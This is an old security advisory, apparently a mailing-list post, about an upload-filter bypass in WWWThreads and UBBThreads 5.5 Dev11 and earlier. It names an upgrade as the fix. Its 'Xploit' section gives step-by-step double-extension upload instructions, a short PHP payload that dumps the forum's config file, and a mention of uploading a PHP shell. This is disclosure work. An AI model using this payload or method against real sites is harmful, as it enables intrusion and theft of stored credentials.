[ WWWThreads, UBBThreads ] Security Hole in upload system

[Root Extractor <condor () phreaker net>]

[ WWWThreads, UBBThreads ] Security Hole in 
upload system

Author: RootExtractor, CompuMe
condor () phreaker net, compume2000 () hotmail com

I.   Details 
II.  Vulnerable ver's
III. Example, Xploit
IV.  Solution

Details :

..: config.inc.php :..
------------------------- snip ------------------------------

// $config['excludefiles'] 
= ".php,.asp,.js,.vbs,.sht,.htm";
   $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

------------------------- snip ------------------------------

 
that files that were not listed in the allow files could 
still be uploaded. Seems you checked the extension 
but if someone added an allowable extension first 
before the bogus extension the file would upload.

vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and piror

not vulnerable : 
UBBThreads 5.5

Example : 
you allow the upload or .txt,.jpg,.bmp,.zip 
all files that don't have those extensions should not 
be uploaded 
However if somebody changes the name of the file to 
blah.txt.php the file will validate and upload......huh !

Xploit :
1) make new file $ touch blah.txt.php
2) edit it       $ vi blah.txt.php (in this step, write a php 
code, for example)

                    <?php
                        $readfile = join("", file
("../config.inc.php"));
                        print $readfile;
                    ?>

3) save & upload it
4) visit your blah file, now you can to see a config file 
of your victim forum
5) i'm replaced readfile code by php shell file


Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/


Copyright 2002 recm security team
http://hop.to/condor